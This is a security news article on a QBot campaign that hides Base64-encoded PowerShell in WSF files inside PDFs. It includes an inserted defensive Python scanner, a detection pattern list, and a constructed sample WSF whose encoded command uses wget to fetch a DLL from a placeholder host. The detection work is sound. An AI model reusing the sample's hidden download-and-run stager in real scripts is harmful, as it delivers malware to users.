QBot Expands Initial Access Malware Strategy With PDF-WSF Combo

The infamous Trojan's operators are switching up tactics with the use of simulated business correspondence, which helps instill trust with intended victims, and a stealthier payload.


A recent surge in QBot Trojan attacks has been observed, spreading via malicious emails written in various languages, including English, German, Italian, and French. The emails are crafted using genuine business letters obtained by the attackers and urge the recipient to open an attached PDF file, which contains several layers of obfuscation that make its maliciousness less detectable by security tools.

According to an analysis by Kaspersky this week, the campaign also relies on reply-chain emails, which make the messages harder for soon-to-be-victims to flag as malicious. As the name suggests, reply-chain hijacking is the practice of gaining access to existing email exchanges (from a listserv or any other source) and replying within them, so that the interloping messages look legitimate, less suspicious, and believable.

The campaign represents a change in tactics for the operators of QBot (aka QakBot or Pinkslipbot), who maintain an access-as-a-service offering that other cybercriminals use to deliver a range of second-stage malware to already-compromised targets. Initially discovered in 2007, QBot has undergone numerous modifications and enhancements over the years, resulting in its widespread distribution as one of the most actively propagated malware strains in 2020. 

These latest improvements help boost stealth and legitimacy, according to security researchers. For instance, the emails alter only minimal parts of the stolen correspondence; they may carry links directly, or attachments that in turn contain links to malicious sites.

"The messages were based on real business letters the attackers had gotten access to, which afforded them the opportunity to join the correspondence thread with messages of their own," the Kaspersky report noted.

QBot's Many Layers of Obfuscation

As for attack flow, the PDF file contains a Windows Script File (WSF) that harbors an obfuscated PowerShell script encoded as a Base64 string. Once the PowerShell script is covertly executed on the computer, it uses the wget utility to retrieve a DLL file from a remote server, and that DLL delivers the QBot malware to the victim's computer. This builds on an existing tactic: last year, QBot operators began using DLL sideloading to deliver malware, a technique that places legitimate and malicious files together in a common directory to avoid detection.
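Seen from the defender's side, the chain described above leaves a recognizable trace: a script block inside the WSF carrying a long Base64 run that decodes to a download command referencing a DLL. The triage helper below is an added example for this article, not Kaspersky's or Dark Reading's code. It extracts the WSF's script bodies, decodes Base64 runs as UTF-16LE (the format PowerShell's `-EncodedCommand` expects) and as plain UTF-8, and reports which download or DLL-staging indicators appear in the plaintext. The sample WSF, its host name and file names are constructed for the demonstration; the indicator lists are general PowerShell knowledge (wget is a built-in alias of Invoke-WebRequest) rather than indicators from the campaign.

```python
"""Triage helper for Windows Script Files (.wsf) that embed Base64-encoded
PowerShell.  Added example for this article; not the vendor's or the
publication's code.  Everything below runs offline on a constructed sample."""
import base64
import re

# <script ...> ... </script> bodies inside the WSF (WSF is XML-like).
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
# A Base64 alphabet run of 40+ characters; shorter runs are mostly noise.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Indicator categories checked against the decoded plaintext.  These are
# general PowerShell download/loader patterns, not campaign-specific IoCs.
INDICATOR_PATTERNS = {
    # Cmdlets and aliases that fetch a remote file; wget/iwr/curl alias Invoke-WebRequest.
    "download_cmdlet": re.compile(
        r"\b(wget|iwr|curl|invoke-webrequest|start-bitstransfer)\b", re.IGNORECASE),
    # .NET WebClient download methods, another common stager idiom.
    "webclient_download": re.compile(r"\b(downloadfile|downloadstring)\s*\(", re.IGNORECASE),
    # A fetched .dll (or rundll32 as its loader) matches the DLL-staging step the article describes.
    "dll_staging": re.compile(r"\.dll\b|\brundll32\b", re.IGNORECASE),
}


def extract_scripts(wsf_text):
    """Return the text of every <script> element in the WSF."""
    return [m.group(1) for m in SCRIPT_RE.finditer(wsf_text)]


def _looks_like_text(s):
    return bool(s) and all(ch.isprintable() or ch in "\r\n\t" for ch in s)


def decode_candidates(blob):
    """Return plausible plaintext decodings of one Base64 run (UTF-16LE first,
    since that is what -EncodedCommand uses, then UTF-8)."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError: bad padding/characters
        return []
    out = []
    for enc in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if _looks_like_text(text):
            out.append(text)
    return out


def scan_wsf(wsf_text):
    """Decode every long Base64 run in the WSF's scripts and report indicator hits."""
    findings = []
    for script in extract_scripts(wsf_text):
        for blob in B64_RE.findall(script):
            for text in decode_candidates(blob):
                hits = sorted(name for name, pat in INDICATOR_PATTERNS.items() if pat.search(text))
                if hits:
                    findings.append({"decoded": text.strip(), "indicators": hits})
    return findings


# Constructed sample: the kind of one-liner the article describes, encoded the
# way PowerShell's -EncodedCommand expects (UTF-16LE, then Base64).  The host
# name is a documentation placeholder, not a real or campaign indicator.
_SAMPLE_CMD = "wget http://example.invalid/stage.dll -OutFile $env:TEMP\\stage.dll"
SAMPLE_ENCODED = base64.b64encode(_SAMPLE_CMD.encode("utf-16-le")).decode("ascii")
SAMPLE_WSF = f"""<job id="main">
<script language="JScript">
var sh = new ActiveXObject("WScript.Shell");
sh.Run("powershell -enc {SAMPLE_ENCODED}", 0, false);
</script>
</job>"""

# Constructed benign control: a long Base64 run that decodes to harmless text.
BENIGN_WSF = (
    '<job id="main"><script language="JScript">\nvar note = "'
    + base64.b64encode(b"Hello from the build script, nothing to see here").decode("ascii")
    + '";\n</script></job>'
)

if __name__ == "__main__":
    for f in scan_wsf(SAMPLE_WSF):
        print("ALERT", f["indicators"], "->", f["decoded"])
    print("benign findings:", scan_wsf(BENIGN_WSF))
```

The decoder deliberately tries UTF-16LE before UTF-8: a UTF-16LE payload read as UTF-8 contains NUL bytes and is rejected by the printable-text check, so each blob yields one reading rather than a duplicate alert. On a real file the same function can be run over every Base64 run in a mail gateway's detonation output or an EDR script-block log.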

The group has recently ramped up its operations and improved its offerings, infecting systems, installing attack frameworks, and selling access to other groups, including Black Basta.

"The WSF is obfuscated to evade detection which will download further payloads," explains Timothy Morris, chief security adviser at Tanium. "The attack 'chaining', or using multiple steps, helps get past some protections since the full context of the nefarious behavior can't be observed as a single activity."

How to Protect the Business From QBot Attacks

Morris notes that the multiple phases in the attack flow, from the initial emails to payloads being downloaded to data exfiltration and theft, require a range of cybersecurity strategies to defend against.

"It is important to have a defense-in-depth strategy that includes detection, monitoring, and protection technologies at the endpoint, as well as Web, network, and email security that is up to date," he says. "Also, training users to these types of threats is important."

Darren Guccione, CEO and co-founder at Keeper Security, says potential targets should also be trained to recognize that, unlike phishing attempts that appear to come from random businesses or the government, the malicious file containing malware will appear to come from someone you've had past email conversations with.

"The threat actors hope to piggyback on your relationship and level of trust to get these contacts to download the files," he explains. "Employees should avoid making risky clicks. Suspicious links should not be clicked and untrusted software should not be installed."

Other email security best practices include verifying the email sender and content before downloading attachments, and hovering over embedded links to see the actual target URL. Defenders should also make sure antivirus and anti-malware solutions are deployed and up to date, and secure endpoints, including PCs, servers, routers, and so on, by keeping them patched.

Guccione says the latest resurgence of QBot, along with new modules and evasion techniques being added, indicates active development of the malware, so companies should be vigilant when it comes to being prepared for the latest changes.

"It’s still a very capable adversary tool that defenders need to protect against," Guccione explains.

About the Author(s)

Nathan Eddy, Contributing Writer

Nathan Eddy is a freelance journalist and award-winning documentary filmmaker specializing in IT security, autonomous vehicle technology, customer experience technology, and architecture and urban planning. A graduate of Northwestern University’s Medill School of Journalism, Nathan currently lives in Berlin, Germany.
